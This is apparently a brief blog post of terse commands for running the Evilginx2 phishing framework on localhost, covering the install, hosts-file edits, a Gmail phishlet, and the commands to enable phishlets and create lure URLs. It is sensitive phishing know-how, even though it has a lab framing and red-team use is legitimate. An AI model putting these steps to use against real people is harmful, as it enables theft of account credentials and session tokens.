Sunday, March 2, 2025

Evilginx On Local host

 


sudo apt install evilginx2


evilginx2 -h


cd /usr/share/evilginx2/phishlets


sudo nano /etc/hosts


add 127.0.0.1 and the name of the phishing domain to use


add your own phishlet : touch gmail.yaml


watch for phish_sub end points and add to your sudo nano /etc/hosts file


sudo evilginx2 --developer


COMMANDS NEEDED

config domain example.com

config ipv4 127.0.0.1

phishlets hostname phishlet_name example.com

phishlets enable phishlet_name

lures create phishlet_name

lures get-url 2

1 comment:

How to Install and Configure Evilginx2 on a Digital Ocean VPS [2025 Guide]

  Introduction: Evilginx2 is a powerful phishing framework often used by red teamers and ethical hackers to simulate advanced man-in-the-mi...